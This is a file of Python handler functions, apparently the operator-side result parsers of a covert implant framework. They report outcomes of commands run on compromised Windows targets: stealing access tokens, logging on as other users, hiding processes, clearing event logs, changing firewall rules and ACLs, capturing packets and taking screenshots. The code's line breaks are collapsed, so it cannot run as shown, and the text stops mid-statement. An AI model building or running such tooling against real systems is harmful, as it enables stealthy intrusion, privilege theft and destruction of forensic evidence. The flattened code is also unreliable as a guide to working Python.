def _handleDuplicateTokenSteal(msg, output): import mcl.data.env if msg.GetCount() == 0: output.EndWithStatus(mcl.target.CALL_SUCCEEDED) return True info = ResultSteal() info.Demarshal(msg) try: alias = 'proc%u' % info.id mcl.data.env.SetValue('_USER_%s' % alias, '0x%08x' % info.hUser, globalValue=True) aliasSet = True except: output.RecordError('Failed to set alias for user') aliasSet = False from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('Logon') xml.AddAttribute('handle', '0x%08x' % info.hUser) if aliasSet: xml.AddAttribute('alias', alias) output.RecordXml(xml) output.GoToBackground() output.End() return True
def DataHandlerMain(namespace, InputFilename, OutputFilename): import mcl.imports import mcl.data.Input import mcl.data.Output import mcl.status import mcl.target import mcl.object.Message mcl.imports.ImportNamesWithNamespace(namespace, 'mca.file.cmd.move', globals()) input = mcl.data.Input.GetInput(InputFilename) output = mcl.data.Output.StartOutput(OutputFilename, input) output.Start('Move', 'move', []) msg = mcl.object.Message.DemarshalMessage(input.GetData()) if input.GetStatus() != mcl.status.MCL_SUCCESS: errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR) moduleError = errorMsg.FindU32( mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE) osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS) output.RecordModuleError(moduleError, osError, errorStrings) output.EndWithStatus(input.GetStatus()) return True results = Result() results.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('Results') if results.afterReboot: xml.AddAttribute('delay', 'true') else: xml.AddAttribute('delay', 'false') xml.AddSubElementWithText('Source', results.fullSrcPath) xml.AddSubElementWithText('Destination', results.fullDstPath) output.RecordXml(xml) output.EndWithStatus(mcl.target.CALL_SUCCEEDED) return True
def _handleStatus(msg, output): submsg = msg.FindMessage(MSG_KEY_RESULT_STATUS) status = ResultStatusHeader() status.Demarshal(submsg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('Status') if status.flags & RESULT_STATUS_FLAG_FIREWALL_ENABLED: xml.AddAttribute('enabled', 'true') else: xml.AddAttribute('enabled', 'false') if status.flags & RESULT_STATUS_FLAG_VISTA: if status.flags & RESULT_STATUS_FLAG_NO_MODIFY: xml.AddAttribute('modify', 'false') else: xml.AddAttribute('modify', 'true') while submsg.GetNumRetrieved() < submsg.GetCount(): if mcl.CheckForStop(): output.EndWithStatus(mcl.target.CALL_FAILED) return False _outputProfile(submsg, output, xml) output.RecordXml(xml) output.End() return True
def _handleAdapters(output, msg): if msg.GetCount() == 0: output.RecordError('No status values returned') return mcl.target.CALL_FAILED submsg = msg.FindMessage(MSG_KEY_RESULT_ADAPTERS) results = ResultFilterInfo() results.Demarshal(submsg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('AdaptersInfo') if results.threadRunning: xml.AddAttribute('threadRunning', 'true') else: xml.AddAttribute('threadRunning', 'false') if results.filterActive: xml.AddAttribute('filterActive', 'true') else: xml.AddAttribute('filterActive', 'false') xml.AddAttribute('numAdapters', '%u' % submsg.GetCount(MSG_KEY_RESULT_ADAPTER_NAME)) while submsg.GetNumRetrieved() < submsg.GetCount(): if mcl.CheckForStop(): return mcl.target.CALL_FAILED name = submsg.FindString(MSG_KEY_RESULT_ADAPTER_NAME) xml.AddSubElementWithText('Adapter', name) output.RecordXml(xml) return mcl.target.CALL_SUCCEEDED
def _handleConnect(namespace, output, msg): import mcl.imports result = ResultConnect() result.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('KiSuCommsInitialized') xml.AddAttribute('id', '0x%08x' % result.instance.id) xml.AddAttribute('versionMajor', '%u' % result.instance.versionMajor) xml.AddAttribute('versionMinor', '%u' % result.instance.versionMinor) xml.AddAttribute('versionFix', '%u' % result.instance.versionFix) xml.AddAttribute('versionBuild', '%u' % result.instance.versionBuild) mcl.imports.ImportWithNamespace(namespace, 'mcf.kisu.ids', globals()) for name in mcf.kisu.ids.nameTable: if mcf.kisu.ids.nameTable[name] == result.instance.id: xml.AddAttribute('name', name) break output.RecordXml(xml) import mcl.data.env mcl.data.env.SetValue(mcf.cmd.kisucomms.COMMS_ESTABLISHED_ENV, '0x%08x' % result.instance.id, globalValue=True) import mcl.tools verInfo = mcl.tools.GetVersion('DeMi') if verInfo != None: mcl.tools.RecordUsage('DeMi', verInfo['full'], mcl.tools.USAGE_FLAG_CHECKED, mcl.tools.USAGE_STATUS_SUCCESSFUL, comments='Connected to 0x%08x' % result.instance.id) return mcl.target.CALL_SUCCEEDED
def DataHandlerMain(namespace, InputFilename, OutputFilename): import mcl.imports import mcl.data.Input import mcl.data.Output import mcl.data.env import mcl.status import mcl.target import mcl.object.Message mcl.imports.ImportNamesWithNamespace(namespace, 'mca.file.cmd.put', globals()) input = mcl.data.Input.GetInput(InputFilename) output = mcl.data.Output.StartOutput(OutputFilename, input) output.Start('Put', 'put', []) msg = mcl.object.Message.DemarshalMessage(input.GetData()) if input.GetStatus() != mcl.status.MCL_SUCCESS: errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR) moduleError = errorMsg.FindU32( mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE) osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS) output.RecordModuleError(moduleError, osError, errorStrings) output.EndWithStatus(input.GetStatus()) return True if msg.GetCount() == 0: mcl.data.env.SetValue(LP_ENV_PUT_COMPLETE, 'true') return True results = Result() try: results.Demarshal(msg) except: output.RecordError('Failed to get callback parameters') mcl.data.env.SetValue(LP_ENV_ERROR_ENCOUNTERED, 'true') output.EndWithStatus(mcl.target.CALL_FAILED) return True if len(results.filePath) > 0: from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('Results') xml.AddSubElementWithText('File', results.filePath) output.RecordXml(xml) mcl.data.env.SetValue(LP_ENV_FILE_OPENED, 'true') bytesLeft = int(mcl.data.env.GetValue(LP_ENV_BYTES_LEFT)) totalBytes = int(mcl.data.env.GetValue(LP_ENV_FILE_SIZE)) if results.bytesWritten > bytesLeft: output.RecordError('Target reported more data written than is left?!') mcl.data.env.SetValue(LP_ENV_ERROR_ENCOUNTERED, 'true') output.EndWithStatus(mcl.target.CALL_FAILED) return True if results.bytesWritten > 0: bytesLeft -= results.bytesWritten from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('Results') xml.AddAttribute('bytesWritten', '%u' % results.bytesWritten) xml.AddAttribute('bytesLeft', '%u' % bytesLeft) xml.AddAttribute('totalBytes', '%u' % totalBytes) output.RecordXml(xml) mcl.data.env.SetValue(LP_ENV_BYTES_LEFT, '%u' % bytesLeft) output.End() return True
def _handleAuditQueryData(msg, output): results = ResultAuditStatus() results.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('Status') if results.auditingEnabled: xml.AddAttribute('current', 'ON') else: xml.AddAttribute('current', 'OFF') while msg.GetNumRetrieved() < msg.GetCount(): if mcl.CheckForStop(): output.EndWithStatus(mcl.target.CALL_FAILED) return False eventResults = ResultCategory() eventResults.Demarshal(msg) sub = xml.AddSubElement('Event') if eventResults.flags & RESULT_FLAG_AUDIT_ONSUCCESS: sub.AddSubElement('OnSuccess') if eventResults.flags & RESULT_FLAG_AUDIT_ONFAILURE: sub.AddSubElement('OnFailure') category = _lookupName(eventResults.categoryGuid) subcategory = _lookupName(eventResults.subcategoryGuid) sub.AddAttribute( 'categoryGUID', '%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x%02x%02x' % (eventResults.categoryGuid[0], eventResults.categoryGuid[1], eventResults.categoryGuid[2], eventResults.categoryGuid[3], eventResults.categoryGuid[4], eventResults.categoryGuid[5], eventResults.categoryGuid[6], eventResults.categoryGuid[7], eventResults.categoryGuid[8], eventResults.categoryGuid[9], eventResults.categoryGuid[10], eventResults.categoryGuid[11], eventResults.categoryGuid[12], eventResults.categoryGuid[13], eventResults.categoryGuid[14], eventResults.categoryGuid[15])) sub.AddAttribute( 'subcategoryGUID', '%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x%02x%02x' % (eventResults.subcategoryGuid[0], eventResults.subcategoryGuid[1], eventResults.subcategoryGuid[2], eventResults.subcategoryGuid[3], eventResults.subcategoryGuid[4], eventResults.subcategoryGuid[5], eventResults.subcategoryGuid[6], eventResults.subcategoryGuid[7], eventResults.subcategoryGuid[8], eventResults.subcategoryGuid[9], eventResults.subcategoryGuid[10], eventResults.subcategoryGuid[11], eventResults.subcategoryGuid[12], eventResults.subcategoryGuid[13], eventResults.subcategoryGuid[14], eventResults.subcategoryGuid[15])) sub.AddAttribute('category', category) sub.AddAttribute('categoryNative', eventResults.category) if len(eventResults.subcategory) > 0: sub.AddAttribute('subcategory', subcategory) sub.AddAttribute('subcategoryNative', eventResults.subcategory) output.RecordXml(xml) output.EndWithStatus(mcl.target.CALL_SUCCEEDED) return True
def DataHandlerMain(namespace, InputFilename, OutputFilename): import mcl.imports import mcl.data.Input import mcl.data.Output import mcl.msgtype import mcl.status import mcl.target import mcl.object.Message mcl.imports.ImportNamesWithNamespace(namespace, 'mca.network.cmd.banner', globals()) input = mcl.data.Input.GetInput(InputFilename) output = mcl.data.Output.StartOutput(OutputFilename, input) output.Start('Banner', 'banner', []) msg = mcl.object.Message.DemarshalMessage(input.GetData()) if input.GetStatus() != mcl.status.MCL_SUCCESS: errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR) moduleError = errorMsg.FindU32( mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE) osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS) output.RecordModuleError(moduleError, osError, errorStrings) if moduleError == ERR_RECV_TIMEOUT: output.SetTaskStatus(mcl.target.CALL_SUCCEEDED) else: output.SetTaskStatus(input.GetStatus()) output.End() return True if msg.GetCount() == 0: output.EndWithStatus(mcl.target.CALL_SUCCEEDED) return True result = Result() result.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() if result.socketType == SOCKET_TYPE_TCP: xml.Start('Connected') output.RecordXml(xml) xml.Start('Transfer') xml.AddAttribute('address', '%s' % result.rspAddr) xml.AddAttribute('port', '%u' % result.port) sub = xml.AddSubElement('Data') sub.AddAttribute('size', '%u' % len(result.response)) if len(result.response) > 0: sub.SetTextAsData(result.response) textStr = '' for char in result.response: if char == ord('\r') or char == ord('\n') or char == ord( '\t') or char >= ord(' ') and char <= ord('~'): textStr = textStr + chr(char) else: textStr = textStr + '?' sub = xml.AddSubElementWithText('Text', textStr) output.RecordXml(xml) output.End() return True
def DataHandlerMain(namespace, InputFilename, OutputFilename): import mcl.imports import mcl.data.Input import mcl.data.Output import mcl.status import mcl.target import mcl.object.Message mcl.imports.ImportNamesWithNamespace(namespace, 'mca.file.cmd.grep', globals()) input = mcl.data.Input.GetInput(InputFilename) output = mcl.data.Output.StartOutput(OutputFilename, input) output.Start('Grep', 'grep', []) msg = mcl.object.Message.DemarshalMessage(input.GetData()) if input.GetStatus() != mcl.status.MCL_SUCCESS: errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR) moduleError = errorMsg.FindU32( mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE) osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS) output.RecordModuleError(moduleError, osError, errorStrings) output.EndWithStatus(input.GetStatus()) return True if msg.GetCount() == 0: output.EndWithStatus(mcl.target.CALL_SUCCEEDED) return True while msg.GetNumRetrieved() < msg.GetCount(): if mcl.CheckForStop(): output.EndWithStatus(mcl.target.CALL_FAILED) return False filemsg = msg.FindMessage(MSG_KEY_RESULT_FILE) result = ResultFileInfo() result.Demarshal(filemsg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('File') xml.AddAttribute('location', result.file) if result.openStatus != 0: errStr = output.TranslateOsError(result.openStatus) xml.AddAttribute('error', errStr) else: while filemsg.GetNumRetrieved() < filemsg.GetCount(): if mcl.CheckForStop(): output.EndWithStatus(mcl.target.CALL_FAILED) return False line = ResultLine() line.Demarshal(filemsg) if len(line.line) > 0: sub = xml.AddSubElement('Line') sub.AddAttribute('position', '%u' % line.position) sub.SetText(line.line) output.RecordXml(xml) output.End() return True
def DataHandlerMain(namespace, InputFilename, OutputFilename): import mcl.imports import mcl.data.Input import mcl.data.Output import mcl.status import mcl.target import mcl.object.Message mcl.imports.ImportNamesWithNamespace(namespace, 'mca.security.cmd.hide', globals()) input = mcl.data.Input.GetInput(InputFilename) output = mcl.data.Output.StartOutput(OutputFilename, input) output.Start('Hide', 'hide', []) msg = mcl.object.Message.DemarshalMessage(input.GetData()) if input.GetStatus() != mcl.status.MCL_SUCCESS: errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR) moduleError = errorMsg.FindU32( mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE) osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS) if moduleError == ERR_LIBRARY_CALL_FAILED: import mcl.hiding.errors.process_hide output.RecordModuleError(moduleError, 0, errorStrings) output.RecordModuleError( osError, 0, mcl.hiding.errors.process_hide.errorStrings) elif moduleError == ERR_JUMPUP_FAILED: output.RecordModuleError(moduleError, 0, errorStrings) import mcl.privilege.errors output.RecordModuleError(osError, 0, mcl.privilege.errors.errorStrings) else: output.RecordModuleError(moduleError, osError, errorStrings) output.EndWithStatus(input.GetStatus()) return True results = Result() results.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() if results.type == RESULT_TYPE_PROCESS_HIDE: xml.Start('Hidden') xml.AddAttribute('type', 'Process') xml.AddAttribute('value', results.item) elif results.type == RESULT_TYPE_PROCESS_UNHIDE: xml.Start('Unhidden') xml.AddAttribute('type', 'Process') xml.AddAttribute('value', results.item) else: output.RecordError('Unhandled result type (%u)' % results.type) output.EndWithStatus(mcl.target.CALL_FAILED) return False if len(results.metaData) > 0: xml.AddSubElementWithText('MetaData', results.metaData) output.RecordXml(xml) output.EndWithStatus(mcl.target.CALL_SUCCEEDED) return True
def DataHandlerMain(namespace, InputFilename, OutputFilename): import mcl.imports import mcl.data.Input import mcl.data.Output import mcl.status import mcl.target import mcl.object.Message mcl.imports.ImportNamesWithNamespace(namespace, 'mca.process.cmd.processoptions', globals()) input = mcl.data.Input.GetInput(InputFilename) output = mcl.data.Output.StartOutput(OutputFilename, input) output.Start('ProcessOptions', 'processoptions', []) msg = mcl.object.Message.DemarshalMessage(input.GetData()) if input.GetStatus() != mcl.status.MCL_SUCCESS: errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR) moduleError = errorMsg.FindU32( mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE) osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS) if moduleError == ERR_ELEVATION_FAILED: import mcl.elevation.errors output.RecordModuleError(moduleError, 0, errorStrings) output.RecordModuleError(osError, 0, mcl.elevation.errors.errorStrings) else: output.RecordModuleError(moduleError, osError, errorStrings) output.EndWithStatus(input.GetStatus()) return True if msg.GetCount() > 0: result = Result() result.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('ExecuteOptions') xml.AddAttribute('processId', '%u' % result.processId) xml.AddAttribute('value', '0x%08x' % result.value) if result.value & EXECUTE_OPTION_EXECUTION_DISABLED: xml.AddSubElement('ExecutionDisabled') if result.value & EXECUTE_OPTION_EXECUTION_ENABLED: xml.AddSubElement('ExecutionEnabled') if result.value & EXECUTE_OPTION_DISABLE_THUNK_EMULATION: xml.AddSubElement('DisableThunkEmulation') if result.value & EXECUTE_OPTION_PERMANENT: xml.AddSubElement('Permanent') if result.value & EXECUTE_OPTION_EXECUTE_DISPATH_ENABLE: xml.AddSubElement('ExecuteDispatchEnabled') if result.value & EXECUTE_OPTION_IMAGE_DISPATCH_ENABLE: xml.AddSubElement('ImageDispatchEnabled') if result.value & EXECUTE_OPTION_DISABLE_EXCEPTION_CHAIN_VALIDATION: xml.AddSubElement('DisableExceptionChainValidation') output.RecordXml(xml) output.EndWithStatus(mcl.target.CALL_SUCCEEDED) return True
def _handleGetStatus(output, msg): results = ResultGetStatus() results.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('Status') if results.filterActive: xml.AddAttribute('filterActive', 'true') else: xml.AddAttribute('filterActive', 'false') if results.packetThreadRunning: xml.AddAttribute('threadRunning', 'true') else: xml.AddAttribute('threadRunning', 'false') xml.AddAttribute('maxCaptureSize', '%u' % results.maxCaptureFileSize) xml.AddAttribute('captureFile', results.captureFile) xml.AddAttribute('captureFileSize', '%u' % results.captureFileSize) xml.AddAttribute('maxPacketSize', '%u' % results.maxPacketSize) if len(results.key) > 0: sub = xml.AddSubElement('EncryptionKey') sub.SetTextAsData(results.key) sub = xml.AddSubElement('Version') sub.AddAttribute('major', '%u' % results.majorVersion) sub.AddAttribute('minor', '%u' % results.minorVersion) sub.AddAttribute('revision', '%u' % results.revision) output.RecordXml(xml) output.EndWithStatus(mcl.target.CALL_SUCCEEDED) return True
def DataHandlerMain(namespace, InputFilename, OutputFilename): import mcl.imports import mcl.data.Input import mcl.data.Output import mcl.msgtype import mcl.status import mcl.target import mcl.object.Message mcl.imports.ImportNamesWithNamespace(namespace, 'mca.process.cmd.environment', globals()) input = mcl.data.Input.GetInput(InputFilename) output = mcl.data.Output.StartOutput(OutputFilename, input) output.Start('Environment', 'environment', []) msg = mcl.object.Message.DemarshalMessage(input.GetData()) if input.GetStatus() != mcl.status.MCL_SUCCESS: errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR) moduleError = errorMsg.FindU32( mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE) osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS) output.RecordModuleError(moduleError, osError, errorStrings) output.EndWithStatus(input.GetStatus()) return True from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('Environment') setType = False while msg.GetNumRetrieved() < msg.GetCount(): if mcl.CheckForStop(): output.EndWithStatus(mcl.target.CALL_FAILED) return False results = Result() results.Demarshal(msg) if not setType: if results.action == ACTION_GET: xml.AddAttribute('action', 'GET') elif results.action == ACTION_SET: xml.AddAttribute('action', 'SET') elif results.action == ACTION_DELETE: xml.AddAttribute('action', 'DELETE') else: xml.AddAttribute('action', 'UNKNOWN') setType = True sub = xml.AddSubElement('Value') sub.AddAttribute('name', results.variable) sub.SetText(results.value) output.RecordXml(xml) output.EndWithStatus(mcl.target.CALL_SUCCEEDED) return True
def DataHandlerMain(namespace, InputFilename, OutputFilename): import mcl.imports import mcl.data.Input import mcl.data.Output import mcl.msgtype import mcl.status import mcl.target import mcl.object.Message mcl.imports.ImportNamesWithNamespace(namespace, 'mca.security.cmd.eventlogclear', globals()) input = mcl.data.Input.GetInput(InputFilename) output = mcl.data.Output.StartOutput(OutputFilename, input) output.Start('EventLogClear', 'eventlogclear', []) msg = mcl.object.Message.DemarshalMessage(input.GetData()) if input.GetStatus() != mcl.status.MCL_SUCCESS: errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR) moduleError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE) osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS) output.RecordModuleError(moduleError, osError, errorStrings) output.EndWithStatus(input.GetStatus()) return True results = Result() results.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('Cleared') if len(results.target) > 0: xml.AddAttribute('target', results.target) xml.SetText(results.logName) output.RecordXml(xml) output.EndWithStatus(mcl.target.CALL_SUCCEEDED) return True
def _handlePacket(mca, sock, pktSize, tgtParams): import mcl import mcl.tasking import array import socket recvBuffer = array.array('B') i = 0 while i < pktSize: recvBuffer.append(0) i = i + 1 packetToSend = array.array('B') total = 0 while total < pktSize: if mcl.CheckForStop(): mcl.tasking.TaskSetStatus(mcl.target.CALL_FAILED) raise RuntimeError('Context is no longer valid') numRcvd = sock.recv_into(recvBuffer, pktSize - total) if numRcvd == 0: raise socket.error('Connection closed by remote host') i = 0 while i < numRcvd: packetToSend.append(recvBuffer[i]) i = i + 1 total = total + numRcvd from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('PacketData') xml.AddAttribute('size', '%u' % pktSize) xml.SetTextAsData(packetToSend) mcl.tasking.OutputXml(xml) _sendPacket(mca, tgtParams, packetToSend)
def DataHandlerMain(namespace, InputFilename, OutputFilename): import mcl.imports import mcl.data.Input import mcl.data.Output import mcl.data.env import mcl.status import mcl.target import mcl.object.Message mcl.imports.ImportNamesWithNamespace(namespace, 'mca.security.cmd.logonasuser', globals()) input = mcl.data.Input.GetInput(InputFilename) output = mcl.data.Output.StartOutput(OutputFilename, input) output.Start('LogonAsUser', 'logonasuser', []) msg = mcl.object.Message.DemarshalMessage(input.GetData()) if input.GetStatus() != mcl.status.MCL_SUCCESS: errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR) moduleError = errorMsg.FindU32( mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE) osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS) output.RecordModuleError(moduleError, osError, errorStrings) output.EndWithStatus(input.GetStatus()) return True if msg.GetCount() == 0: mcl.data.env.SetValue(LP_ENV_PUT_COMPLETE, 'true') return True results = Result() results.Demarshal(msg) try: mcl.data.env.SetValue('_USER_%s' % results.user, '0x%08x' % results.hUser, globalValue=True) except: output.RecordError('Failed to set alias for user') from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('Logon') xml.AddAttribute('handle', '0x%08x' % results.hUser) if len(results.user) > 0: xml.AddAttribute('alias', results.user) if len(results.domain) > 0: xml.AddAttribute('domain', results.domain) output.RecordXml(xml) output.GoToBackground() output.End() return True
def _handleDelete(msg, output): results = ResultDelete() results.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('Delete') xml.AddAttribute('name', results.name) xml.AddAttribute('port', '%u' % results.portNum) if results.protocol == FIREWALL_PROTOCOL_TCP: xml.AddAttribute('protocol', 'TCP') elif results.protocol == FIREWALL_PROTOCOL_UDP: xml.AddAttribute('protocol', 'UDP') else: xml.AddAttribute('protocol', 'unknown') output.RecordXml(xml) output.End() return True
def DataHandlerMain(namespace, InputFilename, OutputFilename): import mcl.imports import mcl.data.Input import mcl.data.Output import mcl.msgtype import mcl.status import mcl.target import mcl.object.Message mcl.imports.ImportNamesWithNamespace(namespace, 'mca.survey.cmd.systemversion', globals()) input = mcl.data.Input.GetInput(InputFilename) output = mcl.data.Output.StartOutput(OutputFilename, input) output.Start('SystemVersion', 'systemversion', []) msg = mcl.object.Message.DemarshalMessage(input.GetData()) if input.GetStatus() != mcl.status.MCL_SUCCESS: errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR) moduleError = errorMsg.FindU32( mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE) osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS) output.RecordModuleError(moduleError, osError, errorStrings) output.EndWithStatus(input.GetStatus()) return True from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() result = Result() result.Demarshal(msg) xml.Start('SystemVersion') if mcl.os.archNames.has_key(result.arch): xml.AddAttribute('architecture', mcl.os.archNames[result.arch]) else: xml.AddAttribute('architecture', 'unknown') xml.AddAttribute('architectureValue', '%u' % result.arch) if mcl.os.osNames.has_key(result.os): xml.AddAttribute('platform', mcl.os.osNames[result.os]) else: xml.AddAttribute('platform', 'unknown') xml.AddAttribute('platformValue', '%u' % result.os) xml.AddAttribute('major', '%u' % result.majorVersion) xml.AddAttribute('minor', '%u' % result.minorVersion) xml.AddAttribute('revisionMajor', '%u' % result.revisionMajor) xml.AddAttribute('revisionMinor', '%u' % result.revisionMinor) xml.AddAttribute('build', '%u' % result.build) xml.AddSubElementWithText('ExtraInfo', result.extraInfo) if result.os == mcl.os.MCL_OS_WINNT or result.os == mcl.os.MCL_OS_WIN9X: sub = xml.AddSubElement('Flags') _addWindowsFlags(sub, result.flags) output.RecordXml(xml) output.EndWithStatus(mcl.target.CALL_SUCCEEDED) return True
def DataHandlerMain(namespace, InputFilename, OutputFilename): import mcl.imports import mcl.data.Input import mcl.data.Output import mcl.msgtype import mcl.status import mcl.target import mcl.object.Message mcl.imports.ImportNamesWithNamespace(namespace, 'mca.file.cmd.cd', globals()) input = mcl.data.Input.GetInput(InputFilename) output = mcl.data.Output.StartOutput(OutputFilename, input) output.Start('Cd', 'cd', []) msg = mcl.object.Message.DemarshalMessage(input.GetData()) if input.GetStatus() != mcl.status.MCL_SUCCESS: errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR) moduleError = errorMsg.FindU32( mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE) osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS) output.RecordModuleError(moduleError, osError, errorStrings) output.EndWithStatus(input.GetStatus()) return True from mcl.object.XmlOutput import XmlOutput result = Result() result.Demarshal(msg) try: import mcl.data.env isVirtualDir = mcl.data.env.IsTrue('IsVirtual') except: isVirtualDir = False xml = XmlOutput() xml.Start('DirectoryInfo') xml.AddSubElementWithText('CurrentDirectory', result.dir) if isVirtualDir: xml.AddAttribute('virtual', 'true') else: xml.AddAttribute('virtual', 'false') output.RecordXml(xml) if isVirtualDir: import mcl.tasking.virtualdir mcl.tasking.virtualdir.Set(result.dir) output.EndWithStatus(input.GetStatus()) return True
def _handleScreenShotData(msg, output): import os import mcl.data.env data = msg.FindData(MSG_KEY_RESULT_SCREENSHOT) if len(data) == 0: output.RecordError('Invalid data for screenshot') return mcl.target.CALL_FAILED else: suffix = '.unk' for prefixData in _imgPrefixes: matched = 0 i = 0 while i < len(prefixData['bytes']): if i + prefixData['offset'] >= len(data): break if data[i + prefixData['offset']] == prefixData['bytes'][i]: matched = matched + 1 i = i + 1 if matched == len(prefixData['bytes']): suffix = prefixData['suffix'] break f, path, logName = output.CreateLogFile(prefix='ScreenShot', suffix=suffix, subDir=SCREENSHOT_DIR, utf8=False) if f == None: output.RecordError('Failed to create file for screenshot in %s' % SCREENSHOT_DIR) return False try: f.write(data) finally: f.close() from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('ScreenShot') xml.AddAttribute('path', path) xml.AddAttribute('subdir', SCREENSHOT_DIR) xml.SetText(logName) output.RecordXml(xml) return mcl.target.CALL_SUCCEEDED
def _handleModuleFree(namespace, output, msg): result = ResultModuleFree() result.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('KiSuModuleFree') xml.AddAttribute('instance', '0x%08x' % result.instance) xml.AddAttribute('moduleHandle', '0x%08x' % result.moduleHandle) output.RecordXml(xml) import mcl.tools verInfo = mcl.tools.GetVersion('DeMi') if verInfo != None: mcl.tools.RecordUsage('DeMi', verInfo['full'], mcl.tools.USAGE_FLAG_EXERCISED, mcl.tools.USAGE_STATUS_SUCCESSFUL, comments='Freed module at 0x%08x from 0x%08x' % (result.moduleHandle, result.instance)) return mcl.target.CALL_SUCCEEDED
def _handleModify(ACE_MASKS, msg, output): if msg.GetCount() == 0: output.EndWithStatus(mcl.target.CALL_SUCCEEDED) return True result = ResultModify() result.Demarshal(msg) from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('AclModified') if result.flags & PARAMS_SET_FLAG_PERMANENT: xml.AddAttribute('removePending', 'false') else: xml.AddAttribute('removePending', 'true') _addAceAccessMask(ACE_MASKS, xml, result.accessMask) output.RecordXml(xml) if result.flags & PARAMS_SET_FLAG_PERMANENT == 0: output.GoToBackground() output.End() return True
def DataHandlerMain(namespace, InputFilename, OutputFilename): import mcl.imports import mcl.data.Input import mcl.data.Output import mcl.status import mcl.target import mcl.object.Message mcl.imports.ImportNamesWithNamespace(namespace, 'mca.survey.cmd.registryhive', globals()) mcl.imports.ImportWithNamespace(namespace, 'mca.survey.cmd.registryhive.types', globals()) input = mcl.data.Input.GetInput(InputFilename) output = mcl.data.Output.StartOutput(OutputFilename, input) output.Start('RegistryHive', 'registryhive', []) msg = mcl.object.Message.DemarshalMessage(input.GetData()) if input.GetStatus() != mcl.status.MCL_SUCCESS: errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR) moduleError = errorMsg.FindU32( mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE) osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS) output.RecordModuleError(moduleError, osError, errorStrings) output.EndWithStatus(input.GetStatus()) return True if msg.GetCount() == 0: output.EndWithStatus(mcl.target.CALL_SUCCEEDED) return True from mcl.object.XmlOutput import XmlOutput xml = XmlOutput() xml.Start('CommandAction') hive = ResultHive() hive.Demarshal(msg) action = 'Unknown' if hive.action == mca.survey.cmd.registryhive.types.ACTION_LOAD: action = 'Load' elif hive.action == mca.survey.cmd.registryhive.types.ACTION_UNLOAD: action = 'Unload' elif hive.action == mca.survey.cmd.registryhive.types.ACTION_SAVE: action = 'Save' xml.AddAttribute('action', action) sub = xml.AddSubElement('Hive') sub.AddAttribute('key', hive.key) sub.AddAttribute('hive', _getHiveString(hive.hive)) sub.AddAttribute('file', hive.file) if hive.permanent: sub.AddAttribute('permanent', 